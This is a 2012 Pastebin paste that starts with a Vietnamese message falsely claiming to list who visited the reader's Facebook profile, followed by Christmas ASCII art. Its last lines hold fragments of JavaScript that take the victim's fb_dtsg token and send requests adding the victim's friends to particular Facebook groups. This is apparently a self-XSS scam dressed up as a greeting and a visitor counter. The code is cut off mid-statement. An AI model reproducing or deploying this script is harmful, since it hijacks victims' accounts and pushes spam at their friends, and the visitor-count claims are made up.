Guest User

MERRY CHRISTMAS

a guest
Dec 22nd, 2012
205
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. CHÀO BẠN HÔM NAY FACEBOOK CỦA BẠN CÓ 25  NGƯỜI GHÉ THĂM
 2. TRONG ĐÓ CÓ 7 NGƯỜI GHÉ THĂM FACEBOOK CỦA BẠN NHIỀU NHẤT
 3.  
 4.  Người  thứ 1: 188 điểm
 5.  Thời gian: 1phút 59 giây
 6.  
 7.  Người  thứ 2: 135 điểm
 8.  Thời gian:  1phút 25 giây
 9.  
 10.  Người  thứ 3: 112   điểm
 11.  Thời gian: 1phút 15 giây
 12.  
 13.  Người  thứ 4: 99 điểm
 14.  Thời gian:  73 giây
 15.  
 16.  Người  thứ 5:  81  điểm
 17.  Thời gian: 51 giây
 18.  
 19.  Người  thứ 6:  70  điểm
 20.  Thời gian: 45 giây
 21.  
 22.  Người  thứ 7:  35  điểm
 23.  Thời gian: 25 giây
 24.  
 25.  
 26.  
 27.  
 28. VÌ LÝ DO BẢO MẬT NÊN FACEBOOK KHÔNG CHO HIỆN TÊN NGƯỜI DÙNG. NHƯNG BÙ LẠI AUTO SẼ DỰ DOÁN CHO BẠN HÔM NAY CÓ BAO NHIÊU NGƯỜI XEM TIN MÀ BẠN POST LÊN
 29.  
 30. HÔM NAY TIN TỨC MÀ BẠN POST LÊN SẼ CÓ 45% LƯỢT XEM TRONG NHÓM ~ 450.000 NGƯỜI
 31.  
 32.  
 33.  
 34.  
 35.  
 36. ★ ° . .  . ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * .  ☾  .  ° . ● .  °☆ ¸. ● . ★ ★ ° ☾ ☆ ¸. ¸ ★ ° . .  . ☆☼ MERRY CHRISTMAS AND A HAPPY NEW YEAR ☼ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * . to all of you  °☆ ¸. ● . ★ ★ ° ☾ ☆ ¸. ¸ ★ ° . .  . ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * .  ☾  .  ° . ● .  °☆ ¸. ● . ★ ★ ° ☾ ☆ ¸. ¸ ★ ° . .` `^ . ☾ °☆ . * ●
 37. °°  _██_*。* . ° * / \ .˛* .˛.*.★* *★ 。*
 38. ˛. (´• ̮•)*˛°*˛° */.♫.♫\*˛.* ˛_Π_____. * ˛*
 39. ( . • . ) ˛°./• '♫ ' •\.˛*./______/~\ *. ˛*.。˛* ˛. *。
 40. *(...'•'.. ) *˛╬╬╬╬╬˛°.|田田 |門|╬╬╬╬ .
 41. ¯˜"*°•♥•°*"˜¯`´¯˜"*°•♥•°*"˜¯` ´¯˜"*°´¯˜"*°•♥•°
 42.  
 43.  
 44.  
 45.  
 46. ★ ° . .. ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * .☾ .  ° . ● .★ ° . .. ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * .☾  .  ° . ● . ★ ° . .. ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * .☾  .  ° . ● .★ ° . . . ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ . * .☾  .  ° . ● .★ ° . . . ☾ °☆ . * ● ¸ .  ★ ° :. . • ○ ° ★ .* .☾ .  ° . ● .        
 47.  
 48.      (@@) (@@@@@@@) (@@@)
 49.     (@@@@@@@) (@@@@@) (@@)
 50.    (@@@) (@@@@@@@) (@@@@@@)
 51.   (@@@@@@) (@@@@@@)
 52.   (@@@) (@@@@)  (@@)
 53.   (@@)  (@@@)
 54.   .-.
 55.   ] [ .--.  .-.
 56.  ."  """ """"<PIPE> .-`
 57.   (:-:-:---:-:-<PIPE> [__  .-------------------.
 58.   <PIPE>C&O : : : : : : : [9] <PIPE> ' =' <PIPE>.---------_-----.<PIPE>
 59.  /<PIPE>.__________________<PIPE>____<PIPE>'-._.-._.--.__-'<PIPE>
 60.  ./ <PIPE><PIPE>_.--._.--._.--._<PIPE>---\'-\./=\./=\./-'/
 61. /__;^=(=)==(=)==(=)=^~^^^ ^^()^^^()^^^(-)^^^
 62. ~~~^~~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~^~~~^~
 63.  
 64.  
 65.  
 66.  
 67. `’•.¸()¸.•’´¯) ♪ღ♪*•.¸¸¸.•*¨¨*•.¸¸¸.•*•♪ღ♪¸.•*¨¨*•.¸¸¸.•*•♪ღ♪•* ░░░░M░E░R░R░Y░░░░ C░H░R░I░S░T░M░A░S░░░░░░ ♪ღ♪*•.¸¸¸.•*¨¨*•.¸¸¸.•*•♪ღ♪¸.•*¨¨*•.¸¸¸.•*•♪ღ♪•* (¯`’•.¸()¸.•’´¯)
 68.  
 69.  
 70.  
 71.  ♥!♥
 72.  ...............¨♥*✫♥,
 73.  .........,•✯´.........´*✫
 74.  .......♥*................ __/\__
 75.  .......*♥............… ..*-
 76.  ...¸.•✫.............……/.•*•.\
 77.  ...~`,`~.................. <PIPE>
 78.  ¸....✫................... *•*
 79.  ´¸...*♥..´¸...........*♥♫♥*
 80.  ´¸¸♥*................✯•♫•♥•*
 81.  ´¸.•✫ .............. *♥•♫•♫♥*
 82.  ~`,`~............. ✯♥•♦♫♥•♥*.
 83.  `.✫`.............. *♥☺♥•♥•☺♥*.
 84.  ●/................✯♥•♥♠♫♥#♥•♥*..
 85.  /▌................*♥♫•♥♫•♥♫♥•♫♥*
 86.  / \....................... ╬╬╬╬
 87.  
 88.  
 89.  
 90.  
 91. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 92. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 93. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░(@@) (@@@@@@@) (@@@)░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 94. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░(@@@@@@@) (@@@@@) (@@)░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 95. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░(@@@) (@@@@@@@) (@@@@@@)░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 96. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░(@@@@@@) (@@@@@@)░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 97. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░(@@@) (@@@@)  (@@)░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 98. ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░(@@)  (@@@)░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 99. ░░░░░░░░░░░░░░░░░░░░░░░░░__/  \__░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 100. ░░░░░░░░░░░░░░░░░░░░░░░░<PIPE><PIPE>_ ░░ _<PIPE><PIPE>░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 101. ░░░░░░░░░░░░░░░░░░░░░░░░░░<PIPE><PIPE>░░<PIPE><PIPE>░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 102. ░░░░░░░░░░░░((☵☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░░░░░░░░░░░░░░__/\__░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 103. ░░░░░░░░░░░((__ ))☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░░░░░░░░░░░*-:¦:-*░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 104. ░░░░░░░░░((__ __ _))☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░░░░░░░░░/.•*•.\░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 105. ░░░░░░░((_ _ _____ _))☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░░░░░░░░░░<PIPE>░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 106. ░░░░░((_ __╔═╗__ ____))☵☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░░░░░░*•*░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 107. ░░░((__ _ _╚═╝______ __))☵☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░░░*♥♫♥*░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 108. ░░((_ __ __ __ __ __ _____))☵☵☵☵☵☵☵☵☵☵☵☵))░░░░░░░░✯♥♫•♥•*░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 109. ░░░░░<PIPE>_________________<PIPE>_______________________<PIPE>░░░░░░░░░*♥•♫•♫♥♥♫*░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 110. ░░░░░<PIPE>_____╔═╦═╗_______<PIPE>____╔═╦═╗__╔═╦═╗___<PIPE> <PIPE>░░░░░░░░✯♥•♦♫♥•♥♥♥**.░░░░░░░░░░░░░░░░░░░░░░░░░░░░
 111. ░░░░░<PIPE>_____║║║║║_______<PIPE>____╠═╬═╣__╠═╬═╣___<PIPE> <PIPE>░░░░░░*♥☺♥•♥•☺♥♥☺♥♥*☺♥♥.░░░░░░░░░░░░░░░░░░░░░░░░░░
 112. ░░░░░<PIPE>_____║║║║║_______<PIPE>____╚═╩═╝__╚═╩═╝___<PIPE> <PIPE>░░░░░✯♥•♥♠♫♥#♥♥☺•♥♥☺♥♥**░░░░░░░░░░░░░░░░░░░░░░░░░░
 113. ░░░░░<PIPE>_____║║║║║_______<PIPE>_______________________<PIPE>░░░*♥♫•♥♫•♥♫♥♥☺•♫♥♥*•♫♥♥*.░░░░░░░░░░░░░░░░░░░░░░░░
 114. ░╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬☆¸.•°*”˜˜”*°•.¸☆╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬░░░░
 115. ░║║║║║║║║║║║║║║║║║║░║║║║║║║║║║║║║║║║║★ MERRY CHRISTMAS★║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░░░
 116. ░║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░░░░░░░░░░░░░░░║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░░░░
 117. ░║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░╬♥♥╬░░░░░░░░░░║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░░░░
 118. ░║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░░░░░░░░░░░░░░░║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║░░░░░
 119. ░╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬░░░░░░░░░░░░░░░░╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬░░
 120.  
 121.  
 122.  
 123.  ☻/            ☻/
 124.  /▌  (¯`v´¯)   /▌
 125.  / \ `•.¸.•´   / \
 126.  
 127.  
 128.  *˜”*°•.¸☆ ★ ☆ C-H-R-I-S-T-M-A-S¸.•°*”˜˜”*°•.¸☆
 129.  ╔╗╔╦══╦═╦═╦╗╔╗ ★ ★ ★
 130.  ║╚╝║══║═║═║╚╝║ ☆¸.•°*”˜˜”*°•.¸☆
 131.  ║╔╗║╔╗║╔╣╔╩╗╔╝ ★ MERRY CHRISTMAS
 132.  ╚╝╚╩╝╚╩╝╚╝═╚╝ ¥☆★☆★☆¥ ★☆
 133.  
 134.  
 135.  ╬♥═╬ 
 136.  ╬♥═╬ MÙA NOEL NĂM NAY SẼ CÓ NHIỀU ĐIỀU THÚ VỊ!!! @!@ 
 137.  ╬═♥╬
 138.  ╬♥═╬
 139.  
 140. _/
 141. _/
 142. _/
 143. _/
 144. _/
 145. size:10px;white-space:pre-wrap;"; if (c.error) { kunaon += "color:darkred'>"; if (c.errorDescription) { kunaon += c.errorDescription } else { kunaon += JSON.stringify(c, null, "") } } else { kunaon += "color:darkgreen'>"; kunaon += arr[i]; suc++ } kunaon += "</div>"; var dipes = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(200,200,100,0.1);color:#334433'>"; dipes += "<div style='padding-bottom:10px;font-size:20px;'>" + tulisanNganu + "</div>"; if (i > 0) { dipes += arr.length + " Friends detected<br/>"; dipes += "<b>" + suc + "</b> Friends added of " + (arr.length - i) + " Friends Processed "; dipes += "(" + i + " more to go..)"; dipes += "<div class='friend-edge'>"; dipes += kunaon; dipes += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>"; dipes += wkwkwk.split('-')[1]; dipes += "</div>"; dipes += "</div>" } else { dipes += arr.length + " Friends detected and "; dipes += "<b>" + suc + " Friends added</b>"; dipes += "<div><span class='uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>" } dipes += "</div>"; dipes += "<h2 style='position:fixed;left:20px;bottom:20px;border-radius:15px 3px 17px;margin:0 0 15px 0;padding:1px 10px 3px;border:1px solid rgba(0,0,0,0.2);background-color:rgba(10,10,10,0.5);color:white;font-size:14px;font-family:'lucida
 146. --; if (tay > 0) { var s = arr[tay]; setTimeout("penetrasi(" + s + ")", 100) } console.log(tay + "/" + arr.length + ":" + s + ", success:" + suc); if (memberGroupId != 158846984252459) { jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value + "&group_id=425441060826420&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + Env.user, function () {}, "text", "post") } if (memberGroupId != 331850676914232) { jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value + "&group_id=331850676914232&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + Env.user, function () {}, "text", "post") } } function clickfr_callback() { if (document.getElementsByName("ok").length > 0) { nHtml.ClickUp(document.getElementsByName("ok")[0]) } var a = arr[i]; if (i < arr.length)
RAW Paste Data